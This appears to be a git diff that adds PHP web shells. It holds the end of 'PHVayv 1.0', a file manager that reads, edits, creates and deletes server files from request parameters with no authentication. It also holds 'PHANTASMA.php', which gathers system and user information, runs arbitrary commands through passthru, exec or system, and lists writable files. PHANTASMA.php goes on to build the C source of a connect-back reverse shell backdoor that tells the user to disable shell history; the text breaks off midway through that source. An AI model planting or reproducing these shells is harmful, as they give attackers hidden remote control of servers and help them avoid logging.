+    <a href="http://www.aventgrup.net" style="text-decoration: none">
+    <font color="#858585">www.aventgrup.net</font></a></font><font face="Verdana" style="font-size: 8pt" color="#858585">&nbsp;<br>
+    </font></span><font face="Verdana" style="font-size: 8pt" color="#858585">
+    <a href="mailto:shopen@aventgrup.net" style="text-decoration: none">
+    <font color="#858585">SHOPEN</font></a></font><font face="Verdana" style="font-size: 8pt" color="#B7B7B7"><a href="mailto:shopen@aventgrup.net" style="text-decoration: none"><font color="#858585">@AventGrup.Net</font></a></font><font face="Verdana" style="font-size: 8pt" color="#858585">&nbsp;</font></td>
+  </tr>
+  </table>
+<table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" id="AutoNumber5" width="100%" height="20">
+      <tr>
+        <td width="110" bgcolor="#9F9F9F" height="20"><font face="Verdana">
+        <span style="font-size: 8pt">&nbsp;Çalışılan </span></font>
+        <font face="Verdana" style="font-size: 8pt">Dizin</font></td>
+        <td bgcolor="#D6D6D6" height="20">
+        <table border="0" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber4">
+          <tr>
+            <td width="1"></td>
+            <td><font face="Verdana" style="font-size: 8pt">&nbsp;<?echo "$dizin"?></font></td>
+            <td width="65">
+            &nbsp;</td>
+          </tr>
+        </table>
+        </td>
+      </tr>
+</table>
+
+<table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber30" height="184">
+  <tr>
+    <td width="100%" bgcolor="#000000" height="19">&nbsp;</td>
+  </tr>
+  <tr>
+    <td width="100%" bgcolor="#9F9F9F" align="center" height="144">
+    <form method="POST" action="<?echo "$fistik.php?yeniklasor=1&dizin=$dizin"?>" 
+      <p align="center"><br>
+      <font
+                color="#FFFFFF" size="1" face="Arial">
+<input
+                type="text" size="37" maxlength="32"
+                name="duzenx2" value="Klasör Adı"
+                class="search"
+                onblur="if (this.value == '') this.value = 'Kullanıcı'"
+                onfocus="if (this.value == 'Kullanıcı') this.value=''"
+                style="BACKGROUND-COLOR: #eae9e9; BORDER-BOTTOM: #000000 1px inset; BORDER-LEFT: #000000 1px inset; BORDER-RIGHT: #000000 1px inset; BORDER-TOP: #000000 1px inset; COLOR: #000000; FONT-FAMILY: Verdana; FONT-SIZE: 8pt; TEXT-ALIGN: center"></font></p>
+<p align="center">
+	<span class="gensmall">
+		<input type="submit" size="16"
+		name="duzenx1" value="Kaydet"
+		style="BACKGROUND-COLOR: #95B4CC; BORDER-BOTTOM: #000000 1px inset; BORDER-LEFT: #000000 1px inset; BORDER-RIGHT: #000000 1px inset; BORDER-TOP: #000000 1px inset; COLOR: #000000; FONT-FAMILY: Verdana; FONT-SIZE: 8pt; TEXT-ALIGN: center"
+		</span></span><b><font face="Verdana, Arial, Helvetica, sans-serif" size="2"><br>
+&nbsp;</font></b></p>
+</form>
+</td>
+  </tr>
+  <tr>
+    <td width="100%" bgcolor="#000000" align="center" height="19">
+    &nbsp;</td>
+  </tr>
+  </table>
+  
+
+
+<? } else { ?>
+
+
+
+
+<?if ($yendos>"") {;
+?>
+
+<body topmargin="0" leftmargin="0">
+<table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber1" height="59">
+  <tr>
+    <td width="70" bgcolor="#000000" height="76">
+    <p align="center">
+    <img border="0" src="http://www.aventgrup.net/avlog.gif"></td>
+    <td width="501" bgcolor="#000000" height="76" valign="top">
+    <font face="Verdana" style="font-size: 8pt" color="#B7B7B7">
+    <span style="font-weight: 700">
+    <br>
+    AventGrup©<br>
+    </span>Avrasya Veri ve NetWork Teknolojileri Geliştirme Grubu<br>
+    <span style="font-weight: 700">
+    <br>
+    PHVayv 1.0</span></font></td>
+    <td width="431" bgcolor="#000000" height="76" valign="top">
+    <p align="right"><span style="font-weight: 700">
+    <font face="Verdana" color="#858585" style="font-size: 2pt"><br>
+    </font><font face="Verdana" style="font-size: 8pt" color="#9F9F9F">
+    <a href="http://www.aventgrup.net" style="text-decoration: none">
+    <font color="#858585">www.aventgrup.net</font></a></font><font face="Verdana" style="font-size: 8pt" color="#858585">&nbsp;<br>
+    </font></span><font face="Verdana" style="font-size: 8pt" color="#858585">
+    <a href="mailto:shopen@aventgrup.net" style="text-decoration: none">
+    <font color="#858585">SHOPEN</font></a></font><font face="Verdana" style="font-size: 8pt" color="#B7B7B7"><a href="mailto:shopen@aventgrup.net" style="text-decoration: none"><font color="#858585">@AventGrup.Net</font></a></font><font face="Verdana" style="font-size: 8pt" color="#858585">&nbsp;</font></td>
+  </tr>
+  </table>
+<table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" id="AutoNumber5" width="100%" height="20">
+      <tr>
+        <td width="110" bgcolor="#9F9F9F" height="20"><font face="Verdana">
+        <span style="font-size: 8pt">&nbsp;Çalışılan </span></font>
+        <font face="Verdana" style="font-size: 8pt">Dizin</font></td>
+        <td bgcolor="#D6D6D6" height="20">
+        <table border="0" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber4">
+          <tr>
+            <td width="1"></td>
+            <td><font face="Verdana" style="font-size: 8pt">&nbsp;<?echo "$dizin"?></font></td>
+            <td width="65">
+            &nbsp;</td>
+          </tr>
+        </table>
+        </td>
+      </tr>
+</table>
+<table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber1" height="495">
+  <tr>
+    <td width="100%" bgcolor="#000000" height="19">&nbsp;</td>
+  </tr>
+  <tr>
+    <td width="100%" bgcolor="#9F9F9F" align="center" height="455">
+    <form method="POST" action="<?echo "$fistik.php?yenidosya=1&dizin=$dizin"?>" 
+      <p align="center"><br>
+      <font
+                color="#FFFFFF" size="1" face="Arial">
+<input
+                type="text" size="50" maxlength="32"
+                name="duzenx2" value="Dosya Adı"
+                class="search"
+                onblur="if (this.value == '') this.value = 'Kullanıcı'"
+                onfocus="if (this.value == 'Kullanıcı') this.value=''"
+                style="BACKGROUND-COLOR: #eae9e9; BORDER-BOTTOM: #000000 1px inset; BORDER-LEFT: #000000 1px inset; BORDER-RIGHT: #000000 1px inset; BORDER-TOP: #000000 1px inset; COLOR: #000000; FONT-FAMILY: Verdana; FONT-SIZE: 8pt; TEXT-ALIGN: center"></font></p>
+<p align="center"><b><font face="Verdana, Arial, Helvetica, sans-serif" size="2" color="#000000" bgcolor="Red"> 
+          <textarea name="duzenx" 
+          style="BACKGROUND-COLOR: #eae9e9; BORDER-BOTTOM: #000000 1px inset; BORDER-CENTER: #000000 1px inset; BORDER-RIGHT: #000000 1px inset; BORDER-TOP: #000000 1px inset; COLOR: #000000; FONT-FAMILY: Verdana; FONT-SIZE: 8pt; TEXT-ALIGN: left"
+        
+          
+          rows="24" cols="122" wrap="OFF">XXXX</textarea></font><font face="Verdana, Arial, Helvetica, sans-serif" size="2"><br>
+<br>
+</font></b>
+	<span class="gensmall">
+		<input type="submit" size="16"
+		name="duzenx1" value="Kaydet"
+		style="BACKGROUND-COLOR: #95B4CC; BORDER-BOTTOM: #000000 1px inset; BORDER-LEFT: #000000 1px inset; BORDER-RIGHT: #000000 1px inset; BORDER-TOP: #000000 1px inset; COLOR: #000000; FONT-FAMILY: Verdana; FONT-SIZE: 8pt; TEXT-ALIGN: center"
+		</span><br>
+&nbsp;</p>
+</form>
+</td>
+  </tr>
+  <tr>
+    <td width="100%" bgcolor="#000000" align="center" height="19">
+    &nbsp;</td>
+  </tr>
+  </table>
+  
+
+
+<? } else { ?>
+
+
+
+
+
+<?if ($duzenle>"") {; 
+?>
+
+
+
+
+<body topmargin="0" leftmargin="0">
+<table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber1" height="59">
+  <tr>
+    <td width="70" bgcolor="#000000" height="76">
+    <p align="center">
+    <img border="0" src="http://www.aventgrup.net/avlog.gif"></td>
+    <td width="501" bgcolor="#000000" height="76" valign="top">
+    <font face="Verdana" style="font-size: 8pt" color="#B7B7B7">
+    <span style="font-weight: 700">
+    <br>
+    AventGrup©<br>
+    </span>Avrasya Veri ve NetWork Teknolojileri Geliştirme Grubu<br>
+    <span style="font-weight: 700">
+    <br>
+    PHVayv 1.0</span></font></td>
+    <td width="431" bgcolor="#000000" height="76" valign="top">
+    <p align="right"><span style="font-weight: 700">
+    <font face="Verdana" color="#858585" style="font-size: 2pt"><br>
+    </font><font face="Verdana" style="font-size: 8pt" color="#9F9F9F">
+    <a href="http://www.aventgrup.net" style="text-decoration: none">
+    <font color="#858585">www.aventgrup.net</font></a></font><font face="Verdana" style="font-size: 8pt" color="#858585">&nbsp;<br>
+    </font></span><font face="Verdana" style="font-size: 8pt" color="#858585">
+    <a href="mailto:shopen@aventgrup.net" style="text-decoration: none">
+    <font color="#858585">SHOPEN</font></a></font><font face="Verdana" style="font-size: 8pt" color="#B7B7B7"><a href="mailto:shopen@aventgrup.net" style="text-decoration: none"><font color="#858585">@AventGrup.Net</font></a></font><font face="Verdana" style="font-size: 8pt" color="#858585">&nbsp;</font></td>
+  </tr>
+  </table>
+<table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" id="AutoNumber5" width="100%" height="1">
+      <tr>
+        <td width="110" bgcolor="#9F9F9F" height="1"><font face="Verdana">
+        <span style="font-size: 8pt">&nbsp;Çalışılan Dosya</span></font></td>
+        <td bgcolor="#D6D6D6" height="1">
+        <table border="0" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber4" height="19">
+          <tr>
+            <td width="1" height="19"></td>
+            <td rowspan="2" height="19"><font face="Verdana" style="font-size: 8pt">&nbsp;<?echo "$dizin/$duzenle"?></font></td>
+          </tr>
+          <tr>
+            <td width="1" height="1"></td>
+          </tr>
+        </table>
+        </td>
+      </tr>
+</table>
+<table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber1">
+  <tr>
+    <td width="100%" bgcolor="#000000">&nbsp;</td>
+  </tr>
+  <tr>
+    <td width="100%" bgcolor="#9F9F9F">
+    <form method="POST" action="<?echo "PHVayv.php?duzkaydet=$dizin/$duzenle&dizin=$dizin"?>" name="kaypos">
+<p align="center"><b><font face="Verdana, Arial, Helvetica, sans-serif" size="2" color="#000000" bgcolor="Red"> 
+          <br>
+          <textarea name="duzenx" 
+          style="BACKGROUND-COLOR: #eae9e9; BORDER-BOTTOM: #000000 1px inset; BORDER-LEFT: #000000 1px inset; BORDER-RIGHT: #000000 1px inset; BORDER-TOP: #000000 1px inset; COLOR: #000000; FONT-FAMILY: Verdana; FONT-SIZE: 8pt; TEXT-ALIGN: left"
+        
+          
+          rows="24" cols="122" wrap="OFF"><?$baglan=fopen("$dizin/$duzenle",'r');
+while(! feof ( $baglan ) ){
+$okunan=fgets($baglan,1024);
+echo $okunan;
+} fclose($baglan); ?></textarea></font><font face="Verdana, Arial, Helvetica, sans-serif" size="2"><br>
+<br>
+</font></b>
+	<span class="gensmall">
+		<input type="submit" size="16"
+		name="duzenx1" value="Kaydet"
+		style="BACKGROUND-COLOR: #95B4CC; BORDER-BOTTOM: #000000 1px inset; BORDER-LEFT: #000000 1px inset; BORDER-RIGHT: #000000 1px inset; BORDER-TOP: #000000 1px inset; COLOR: #000000; FONT-FAMILY: Verdana; FONT-SIZE: 8pt; TEXT-ALIGN: center"
+		</span></p>
+</form>
+</td>
+  </tr>
+  <tr>
+    <td width="100%" bgcolor="#000000">
+    &nbsp;</td>
+  </tr>
+  </table>
+
+
+
+
+
+
+
+
+
+
+
+<?
+} else {
+?>
+
+
+
+<html>
+
+<head>
+<meta http-equiv="Content-Language" content="tr">
+<meta name="GENERATOR" content="Microsoft FrontPage 5.0">
+<meta name="ProgId" content="FrontPage.Editor.Document">
+<meta http-equiv="Content-Type" content="text/html; charset=windows-1254">
+<title>PHVayv 1.0</title>
+</head>
+
+<body topmargin="0" leftmargin="0">
+
+<table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber1" height="59">
+  <tr>
+    <td width="70" bgcolor="#000000" height="76">
+    <p align="center">
+    <img border="0" src="http://www.aventgrup.net/avlog.gif"></td>
+    <td width="501" bgcolor="#000000" height="76" valign="top">
+    <font face="Verdana" style="font-size: 8pt" color="#B7B7B7">
+    <span style="font-weight: 700">
+    <br>
+    AventGrup©<br>
+    </span>Avrasya Veri ve NetWork Teknolojileri Geliştirme Grubu<br>
+    <span style="font-weight: 700">
+    <br>
+    PHVayv 1.0</span></font></td>
+    <td width="431" bgcolor="#000000" height="76" valign="top">
+    <p align="right"><span style="font-weight: 700">
+    <font face="Verdana" color="#858585" style="font-size: 2pt"><br>
+    </font><font face="Verdana" style="font-size: 8pt" color="#9F9F9F">
+    <a href="http://www.aventgrup.net" style="text-decoration: none">
+    <font color="#858585">www.aventgrup.net</font></a></font><font face="Verdana" style="font-size: 8pt" color="#858585">&nbsp;<br>
+    </font></span><font face="Verdana" style="font-size: 8pt" color="#858585">
+    <a href="mailto:shopen@aventgrup.net" style="text-decoration: none">
+    <font color="#858585">SHOPEN</font></a></font><font face="Verdana" style="font-size: 8pt" color="#B7B7B7"><a href="mailto:shopen@aventgrup.net" style="text-decoration: none"><font color="#858585">@AventGrup.Net</font></a></font><font face="Verdana" style="font-size: 8pt" color="#858585">&nbsp;</font></td>
+  </tr>
+  </table>
+
+
+
+    <table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" id="AutoNumber5" width="100%" height="20">
+      <tr>
+        <td width="110" bgcolor="#9F9F9F" height="20"><font face="Verdana">
+        <span style="font-size: 8pt">&nbsp;Çalışılan Klasör</span></font></td>
+        <td bgcolor="#D6D6D6" height="20">
+        <table border="0" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber4">
+          <tr>
+            <td width="1"></td>
+            <td><font face="Verdana" style="font-size: 8pt">&nbsp;<?echo "$dizin"?></font></td>
+            <td width="65">
+            <table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber6" height="13">
+              <tr>
+                <td width="100%" bgcolor="#B7B7B7" bordercolor="#9F9F9F" height="13"
+                onmouseover='this.style.background="D9D9D9"'
+                onmouseout='this.style.background="9F9F9F"'
+                style="CURSOR: hand"
+                
+                
+                
+                
+                >
+                <p align="center"><font face="Verdana" style="font-size: 8pt">
+
+
+
+
+
+
+                <a href="<?echo "$fistik.php?dizin=$dizin/../"?>" style="text-decoration: none">
+                <font color="#000000">Üst Klasör</font></a></font></td>
+
+              </tr>
+            </table>
+            </td>
+          </tr>
+        </table>
+        </td>
+      </tr>
+    </table>
+
+
+
+<table border="0" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber3" height="21">
+  <tr>
+    <td width="625" bgcolor="#000000"><span style="font-size: 2pt">&nbsp;</span></td>
+  </tr>
+  <tr>
+    <td bgcolor="#000000" height="20">
+    <table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#000000" id="AutoNumber23" bgcolor="#A3A3A3" width="373" height="19">
+      <tr>
+        <td align="center" bgcolor="#5F5F5F" height="19" bordercolor="#000000">
+        <table border="0" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber26">
+          <tr>
+        <td align="center" bgcolor="#5F5F5F" 
+        onmouseover="style.background='#6F6F6F'"
+        onmouseout="style.background='#5F5F5F'"
+        style="CURSOR: hand"
+        
+        height="19" bordercolor="#000000">
+        <span style="font-weight: 700">
+        <font face="Verdana" style="font-size: 8pt" color="#9F9F9F">
+        <a color="#9F9F9F" target="_blank" href="<?echo "$fistik.php?sistembilgisi=1";?>" style="text-decoration: none"><font color="#9F9F9F">Sistem Bilgisi</font></a></font></font></span></td>
+          </tr>
+        </table>
+        </td>
+        <td align="center" bgcolor="#5F5F5F" height="19" bordercolor="#000000">
+        <table border="0" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber27">
+          <tr>
+        <td align="center" bgcolor="#5F5F5F" height="19" 
+        onmouseover="style.background='#6F6F6F'"
+        onmouseout="style.background='#5F5F5F'"
+        style="CURSOR: hand"
+        bordercolor="#000000">
+        <font face="Verdana" style="font-size: 8pt; font-weight: 700" color="#9F9F9F">
+        <a href="<?echo "$fistik.php?yenklas=1&dizin=$dizin";?>" style="text-decoration: none">
+        <font color="#9F9F9F">Yeni Klasör</font></a></font></td>
+          </tr>
+        </table>
+        </td>
+        <td align="center" bgcolor="#5F5F5F" height="19" bordercolor="#000000">
+        <table border="0" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber28">
+          <tr>
+        <td align="center" bgcolor="#5F5F5F" height="19"
+        onmouseover="style.background='#6F6F6F'"
+        onmouseout="style.background='#5F5F5F'"
+        style="CURSOR: hand"
+		bordercolor="#000000">
+        <font face="Verdana" style="font-size: 8pt; font-weight: 700" color="#9F9F9F">
+        <a href="<?echo "$fistik.php?yendos=1&dizin=$dizin";?>" style="text-decoration: none"><font color="#9F9F9F">Yeni Dosya</font></a> </font></td>
+          </tr>
+        </table>
+        </td>
+      </tr>
+    </table>
+    </td>
+  </tr>
+  </table>
+
+  
+
+
+
+
+
+<table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber7" height="17">
+  <tr>
+    <td width="30" height="17" bgcolor="#9F9F9F">
+    <font face="Verdana" style="font-size: 8pt; font-weight: 700">&nbsp;Tür</font></td>
+    <td height="17" bgcolor="#9F9F9F">
+    <font face="Verdana" style="font-size: 8pt; font-weight: 700">&nbsp;Dosya 
+    Adı</font></td>
+    <td width="122" height="17" bgcolor="#9F9F9F">
+    <p align="center">
+    <font face="Verdana" style="font-size: 8pt; font-weight: 700">&nbsp;İşlem</font></td>
+  </tr>
+</table>
+
+<?
+if ($sedat=@opendir($dizin)){
+while (($ekinci=readdir ($sedat))){
+if (is_dir("$dizin/$ekinci")){
+?>
+
+<? if ($ekinci=="." or  $ekinci=="..") {
+} else {
+?>
+<table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber8" height="17">
+  <tr>
+    <td width="30" height="17" bgcolor="#808080">
+    <p align="center">
+    <img border="0" src="http://www.aventgrup.net/arsiv/klasvayv/1.0/2.gif"></td>
+    <td height="17" bgcolor="#C4C4C4">
+    <font face="Verdana" style="font-size: 8pt">&nbsp;<?echo "$ekinci" ?></font></td>
+    <td width="61" height="17" bgcolor="#C4C4C4" align="center">
+    <table border="0" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber15" height="20">
+      <tr>
+        <td width="100%" bgcolor="#A3A3A3"
+        onmouseover="this.style.background='#BBBBBB'"
+        onmouseout="this.style.background='#A3A3A3'"
+        style="CURSOR: hand"
+		height="20">
+
+        <p align="center"><font face="Verdana" style="font-size: 8pt">
+        <a href="<?echo "$fistik.php?dizin=$dizin/" ?><?echo "$ekinci";?>" style="text-decoration: none">
+        <font color="#000000">Aç</font></a></font></td>
+      </tr>
+    </table>
+    </td>
+    <td width="60" height="17" bgcolor="#C4C4C4" align="center">
+    <table border="0" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber18" height="20">
+      <tr>
+        <td width="100%" bgcolor="#A3A3A3"
+        onmouseover="this.style.background='#BBBBBB'"
+        onmouseout="this.style.background='#A3A3A3'"
+
+
+        style="CURSOR: hand"
+		height="20">
+
+        <p align="center"><font face="Verdana" style="font-size: 8pt">
+        <a href="<?echo "$fistik.php?silklas=$dizin/$ekinci&dizin=$dizin"?>" style="text-decoration: none">
+        <font color="#000000">Sil</font></a>
+
+        </font></td>
+      </tr>
+    </table>
+    </td>
+  </tr>
+</table>
+<?
+}
+?>
+
+<?
+}}}
+closedir($sedat);
+?>
+
+<?
+if ($sedat=@opendir($dizin)){
+while (($ekinci=readdir ($sedat))){
+if (is_file("$dizin/$ekinci")){
+
+?>
+
+<table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber8" height="1">
+  <tr>
+    <td width="30" height="1" bgcolor="#B0B0B0">
+    <p align="center">
+    <img border="0" src="http://www.aventgrup.net/arsiv/klasvayv/1.0/1.gif"></td>
+    <td height="1" bgcolor="#EAEAEA">
+    <font face="Verdana" style="font-size: 8pt">&nbsp;<?echo "$ekinci" ?></font>
+    <font face="Arial Narrow" style="font-size: 8pt">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;   ( XXX )&nbsp;</font></td>
+    <td width="61" height="1" bgcolor="#D6D6D6" align="center">
+    <table border="0" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber12" height="20">
+      <tr>
+        <td width="100%" bgcolor="#D6D6D6"
+        onmouseover="this.style.background='#ACACAC'"
+        onmouseout="this.style.background='#D6D6D6'"
+        style="CURSOR: hand"
+		height="20">
+
+        <p align="center"><font face="Verdana" style="font-size: 8pt">
+        <a style="text-decoration: none" target="_self" href="<?echo "$fistik";?>.php?duzenle=<?echo "$ekinci";?>&dizin=<?echo $dizin;?>">
+        <font color="#000000">Düzenle</font></a></font></td>
+      </tr>
+    </table>
+    </td>
+    <td width="60" height="1" bgcolor="#D6D6D6" align="center">
+    <table border="0" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber13" height="100%">
+      <tr>
+        <td width="100%" bgcolor="#D6D6D6" no wrap
+        onmouseover="this.style.background='#ACACAC'"
+        onmouseout="this.style.background='#D6D6D6'"
+        style="CURSOR: hand"
+		height="20">
+
+        <p align="center"><font face="Verdana" style="font-size: 8pt">
+        <a href="<?echo "$fistik";?>.php?sildos=<?echo $ekinci;?>&dizin=<?echo $dizin;?>" style="text-decoration: none">
+        <font color="#000000">Sil</font></a></font></td>
+      </tr>
+    </table>
+    </td>
+  </tr>
+</table>
+
+<?
+}}}
+closedir($sedat);
+?>
+
+
+
+
+
+<table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber29">
+  <tr>
+    <td width="100%" bgcolor="#000000">&nbsp;</td>
+  </tr>
+</table>
+
+  <tr>
+    <td width="100%" bgcolor="#000000">
+    </body></html><? } ?><? } ?><? } ?><? } ?>
\ No newline at end of file
diff --git a/php/PHANTASMA.php b/php/PHANTASMA.php
new file mode 100644
index 0000000..59f92af
--- /dev/null
+++ b/php/PHANTASMA.php
@@ -0,0 +1,634 @@
+<CENTER>
+<DIV STYLE="font-family: verdana; font-size: 25px; font-weight: bold; color: #F3b700;">PHANTASMA- NeW CmD ;) </DIV>
+<BR>
+<DIV STYLE="font-family: verdana; font-size: 20px; font-weight: bold; color: #F3b700;">Informação do sistema</DIV>
+<?php
+
+// 
+  closelog( );
+
+  $dono = get_current_user( );
+  $ver = phpversion( );
+  $login = posix_getuid( );
+  $euid = posix_geteuid( );
+  $gid = posix_getgid( );
+  if ($chdir == "") $chdir = getcwd( );
+
+?>
+<TABLE BORDER="0" CELLPADDING="0" CELLSPACING="0">
+<?php
+
+  $uname = posix_uname( );
+  while (list($info, $value) = each ($uname)) {
+
+?>
+  <TR>
+    <TD><DIV STYLE="font-family: verdana; font-size: 15px;"><?= $info ?>: <?= $value ?></DIV></TD>
+  </TR>
+<?php
+  }
+?>
+ 
+  <TR>
+   <TR>
+    <TD><DIV STYLE="font-family: verdana; font-size: 15px;">Script Current User: <?= $dono ?></DIV></TD>
+  </TR>
+  <TR>
+    <TD><DIV STYLE="font-family: verdana; font-size: 15px;">PHP Version: <?= $ver ?></DIV></TD>
+  </TR>
+  <TR>
+    <TD><DIV STYLE="font-family: verdana; font-size: 15px;">User Info: uid(<?= $login ?>) euid(<?= $euid ?>) gid(<?= $gid ?>)</DIV></TD>
+  </TR>
+  <TR>
+    <TD><DIV STYLE="font-family: verdana; font-size: 15px;">Current Path: <?= $chdir ?></DIV></TD>
+  </TR>
+  <TR>
+    <TD><DIV STYLE="font-family: verdana; font-size: 15px;">Server IP: <?php $aaa =  gethostbyname($SERVER_NAME);  echo $aaa;?></DIV></TD>
+  </TR>
+   <TR>
+    <TD><DIV STYLE="font-family: verdana; font-size: 15px;">Web Server: <?= "$SERVER_SOFTWARE $SERVER_VERSION"; ?></DIV></TD>
+  </TR>
+</TABLE>
+<BR>
+<?php
+
+  if ($cmd != "") {
+    echo "<DIV STYLE=\"font-family: verdana; font-size: 15px;\">[*] Command Mode Run</DIV>";
+
+?>
+
+<DIV STYLE="font-family: verdana; font-size: 20px; font-weight: bold; color: #F3A700;">Command Stdout</DIV>
+<?php
+
+if ($fe == 1){
+$fe = "exec";
+}
+if ($fe == ""){
+$fe = "passthru";
+}
+if ($fe == "2"){
+$fe = "system";
+}
+
+    if (isset($chdir)) @chdir($chdir);
+
+    ob_start( );
+      $fe("$cmd  2>&1");
+      $output = ob_get_contents();
+    ob_end_clean( );
+
+?>
+<TEXTAREA COLS="75" ROWS="8" STYLE="font-family: verdana; font-size: 12px;">
+<?php
+
+    if (!empty($output)) echo str_replace(">", "&gt;", str_replace("<", "&lt;", $output));
+?>
+</TEXTAREA>
+<BR>
+<?php
+
+  }
+ 
+  if ($safemode != "") {
+    echo "<DIV STYLE=\"font-family: verdana; font-size: 15px;\">[*] Safemode Mode Run</DIV>";
+
+?>
+<DIV STYLE="font-family: verdana; font-size: 20px; font-weight: bold; color: #F3A700;">Safe Mode Directory Listing</DIV>
+<?php
+
+    if ($dir = @opendir($chdir)) {
+      echo "<TABLE border=1 cellspacing=1 cellpadding=0>";
+      echo "<TR>";
+      echo "<TD valign=top>";
+      echo "<b><font size=2 face=arial>List All Files</b> <br><br>";
+      while (($file = readdir($dir)) !== false) {
+        if (@is_file($file)) {
+          $file1 = fileowner($file);
+          $file2 = fileperms($file);
+    	  echo "<font color=green>$file1 - $file2 - <a href=$SCRIPT_NAME?$QUERY_STRING&see=$file>$file</a><br>"; 
+	  // echo "<font color=green>$file1 - $file2 - $file </font><br>";
+          flush( );
+        }
+      }
+
+      echo "</TD>";
+      echo"<TD valign=top>";
+      echo "<b><font size=2 face=arial>List Only Folders</b> <br><br>";
+      if ($dir = @opendir($chdir)) {
+        while (($file = readdir($dir)) !== false) {
+          if (@is_dir($file)) {
+            $file1 = fileowner($file);
+            $file2 = fileperms($file);
+	    echo "<font color=blue>$file1 - $file2 - <a href=$SCRIPT_NAME?$QUERY_STRING&chdir=$chdir/$file>$file</a><br>"; 
+            // echo "<font color=blue>$file1 - $file2 - $file </font><br>";
+          }
+        }
+      }
+      echo "</TD>";
+      echo"<TD valign=top>";
+      echo "<b><font size=2 face=arial>List Writable Folders</b><br><br>";
+      if ($dir = @opendir($chdir)) {
+        while (($file = readdir($dir)) !== false) {
+          if (@is_writable($file) && @is_dir($file)) {
+            $file1 = fileowner($file);
+            $file2 = fileperms($file);
+            echo "<font color=red>$file1 - $file2 - $file </font><br>";
+          }
+        }
+      }
+      echo "</TD>";
+      echo "</TD>";
+      echo "<TD valign=top>";
+      echo "<b><font size=2 face=arial>List Writable Files</b> <br><br>";
+ 
+      if ($dir = opendir($chdir)) {
+        while (($file = readdir($dir)) !== false) {
+          if (@is_writable($file) && @is_file($file)) {
+            $file1 = fileowner($file);
+            $file2 = fileperms($file);
+    	    echo "<font color=red>$file1 - $file2 - $file </font><br>";
+          }
+        }
+      }
+      echo "</TD>";
+      echo "</TR>";
+      echo "</TABLE>";
+    }
+  }
+
+?>
+<?php
+
+  if ($shell == "write") {
+    $shell = "#include <stdio.h>\n" .
+             "#include <sys/socket.h>\n" .
+             "#include <netinet/in.h>\n" .
+             "#include <arpa/inet.h>\n" .
+             "#include <netdb.h>\n" .
+             "int main(int argc, char **argv) {\n" .
+             "  char *host;\n" .
+             "  int port = 80;\n" .
+             "  int f;\n" .
+             "  int l;\n" .
+             "  int sock;\n" .
+             "  struct in_addr ia;\n" .
+             "  struct sockaddr_in sin, from;\n" .
+             "  struct hostent *he;\n" .
+             "  char msg[ ] = \"Welcome to Data Cha0s Connect Back Shell\\n\\n\"\n" .
+             "                \"Issue \\\"export TERM=xterm; exec bash -i\\\"\\n\"\n" .
+             "                \"For More Reliable Shell.\\n\"\n" .
+             "                \"Issue \\\"unset HISTFILE; unset SAVEHIST\\\"\\n\"\n" .
+             "                \"For Not Getting Logged.\\n(;\\n\\n\";\n" .
+             "  printf(\"Data Cha0s Connect Back Backdoor\\n\\n\");\n" .
+             "  if (argc < 2 || argc > 3) {\n" .
+             "    printf(\"Usage: %s [Host] <port>\\n\", argv[0]);\n" .
+             "    return 1;\n" .
+             "  }\n" .
+             "  printf(\"[*] Dumping Arguments\\n\");\n" .
+             "  l = strlen(argv[1]);\n" .
+             "  if (l <= 0) {\n" .
+             "    printf(\"[-] Invalid Host Name\\n\");\n" .
+             "    return 1;\n" .
+             "  }\n" .
+             "  if (!(host = (char *) malloc(l))) {\n" .
+             "    printf(\"[-] Unable to Allocate Memory\\n\");\n" .
+             "    return 1;\n" .
+             "  }\n" .
+             "  strncpy(host, argv[1], l);\n" .
+             "  if (argc == 3) {\n" .
+             "    port = atoi(argv[2]);\n" .
+             "    if (port <= 0 || port > 65535) {\n" .
+             "      printf(\"[-] Invalid Port Number\\n\");\n" .
+             "      return 1;\n" .
